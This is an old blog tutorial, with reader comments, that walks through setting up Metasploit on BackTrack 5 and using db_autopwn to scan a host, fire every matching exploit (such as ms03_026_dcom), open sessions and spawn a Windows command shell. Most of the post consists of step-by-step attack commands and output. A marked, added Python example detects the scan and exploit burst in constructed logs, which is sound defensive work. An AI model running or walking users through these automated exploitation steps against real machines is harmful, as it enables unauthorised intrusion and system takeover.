Wednesday, May 18, 2011

Autopwn Metasploit Backtrack

backtrack metasploit tutorial
In this tutorial we will look at how to configure Metasploit on a BackTrack 5 machine to launch an automated attack against a target system. All you need is BackTrack 5, which is freely available for download from here. You can install BackTrack 5 in VMware, boot it from a live CD or live USB, or install it on your hard disk. Once installation is done, a console will appear like this:
root@root:~#
If you want to go to GUI mode, type
root@root:~# startx
If you are in GUI mode, open the console and type the following commands exactly as shown, line by line, installing software if prompted...
root@root:~# apt-get install postgresql
root@root:~# sudo apt-get install libpgsql-ruby
root@root:~# sudo su postgres
sh-4.1$ createuser jinni -P
could not change directory to "/root"
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
sh-4.1$ createdb --owner=jinni metasploitdb
could not change directory to "/root"
// the owner must be the PostgreSQL role you will connect as (jinni);
// --owner=root fails with 'role "root" does not exist' because root is
// only an OS user, not a PostgreSQL role
// the "could not change directory" line is a harmless warning
sh-4.1$ exit
exit
root@root:~# msfconsole
msf > db_driver postgresql
[*] Using database driver postgresql
msf > db_connect jinni:tutorial@127.0.0.1:5432/metasploitdb
// jinni is the role created above and tutorial is the password entered at createuser
msf > db_workspace -a tutorialjinni
[*] Added workspace: tutorialjinni
msf > db_nmap 192.168.2.11 -sS -O
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-05-18 18:27 PST
[*] Nmap: Nmap scan report for . . . 
// ...
// NMAP results will be displayed here ...
// ...
// after NMAP finishes 
// we are ready for launching exploits

msf > db_autopwn -p -e -q

[*] (30/300 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.2.11:135

// exploits will launch; when an exploit is successful
// it will show you open sessions like (30/300 [3 sessions]):
To list all open sessions use the command
sessions -l
To interact with a session use the command
sessions -i 3
// 3 is the session number
If the target system is Windows (mine was Windows Server 2000), get a command shell by issuing the command
execute -f cmd.exe -i -H
Hope this helps... I tested it myself. Reference
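The defender's view of the run above, as an added example that is not part of this post: a Python script that flags, in constructed connection records, the two phases a db_autopwn run leaves in network logs, the db_nmap port sweep and the exploit burst that -p/-e produce (one source reconnecting to the same open port once per matching module). The timestamps, addresses and thresholds are constructed assumptions, not data from the post.

```python
"""Added example (not from the post): flag the two phases of a db_autopwn run
in a connection log. Phase 1 is the db_nmap port sweep (many distinct ports from
one source in a short window); phase 2 is the exploit burst that -p/-e produce
(one source reconnecting to the same open port once per matching module)."""
from collections import defaultdict
from datetime import datetime

# Constructed sample records "<timestamp> <src> <dst> <dport>" (not real traffic).
SAMPLE_LOG = "\n".join(
    # sweep: ten ports in ten seconds, as db_nmap -sS would produce
    [f"2011-05-18T18:27:{i + 1:02d} 192.168.2.50 192.168.2.11 {p}"
     for i, p in enumerate([21, 22, 23, 25, 80, 135, 139, 445, 3389, 8080])]
    # burst: twelve exploit attempts against the DCE/RPC port within a minute
    + [f"2011-05-18T18:28:{5 * i:02d} 192.168.2.50 192.168.2.11 135" for i in range(12)]
    # benign file-share traffic from another host, spread over ten minutes
    + [f"2011-05-18T18:{m}:00 192.168.2.60 192.168.2.11 445" for m in (30, 35, 40)]
)

def parse(log):
    """Turn records into (datetime, src, dst, dport) tuples."""
    rows = []
    for line in log.splitlines():
        ts, src, dst, dport = line.split()
        rows.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return rows

def _windowed(items, window_s, score, threshold):
    """Slide a window over time-sorted (ts, value) pairs; return the first
    score that reaches threshold, or None. score() sees the values in the window."""
    items.sort()
    for i, (t0, _) in enumerate(items):
        vals = [v for t, v in items[i:] if (t - t0).total_seconds() <= window_s]
        if score(vals) >= threshold:
            return score(vals)
    return None

def detect(events, min_ports=8, sweep_window_s=60, min_hits=10, burst_window_s=120):
    """Return (sweeps, bursts): (src, dst) -> distinct ports hit within sweep_window_s,
    and (src, dst, dport) -> connections within burst_window_s. Thresholds are assumptions."""
    per_host, per_port = defaultdict(list), defaultdict(list)
    for ts, src, dst, dport in events:
        per_host[(src, dst)].append((ts, dport))
        per_port[(src, dst, dport)].append((ts, dport))
    sweeps = {k: n for k, v in per_host.items()
              if (n := _windowed(v, sweep_window_s, lambda x: len(set(x)), min_ports))}
    bursts = {k: n for k, v in per_port.items()
              if (n := _windowed(v, burst_window_s, len, min_hits))}
    return sweeps, bursts
```

Run against the sample, `detect(parse(SAMPLE_LOG))` reports the sweep from 192.168.2.50 and its burst against port 135, while the slow benign SMB use from 192.168.2.60 stays below both thresholds.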

6 comments:

  1. sh-4.1$ createdb --owner=root metasploitdb
    createdb: datbase creation failed: ERROR: role "root" does not exist

  2. This will happen if the administrator has not created a PostgreSQL user account for you. (PostgreSQL user accounts are distinct from operating system user accounts.)

    reference: http://www.postgresql.org/docs/8.4/interactive/tutorial-createdb.html

    hope that helps

  3. [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 7.31 seconds
    msf > db_autopwn -p -e -q
    [-] Unknown command: db_autopwn.

    I hate backtrack 5

  4. Database Backend Commands
    =========================

    Command         Description
    -------         -----------
    creds           List all credentials in the database
    db_connect      Connect to an existing database
    db_disconnect   Disconnect from the current database instance
    db_driver       Specify a database driver
    db_export       Export a file containing the contents of the database
    db_import       Import a scan result file (filetype will be auto-detected)
    db_nmap         Executes nmap and records the output automatically
    db_status       Show the current database status
    hosts           List all hosts in the database
    loot            List all loot in the database
    notes           List all notes in the database
    services        List all services in the database
    vulns           List all vulnerabilities in the database
    workspace       Switch between database workspaces

    msf >
    UNKNOW db_autopwn

    backtrack 5?

  5. This needs to be updated.
    I got it to work, but it also needs updating!

    Thanks!!

  6. How did you fix it? @ Anonymous
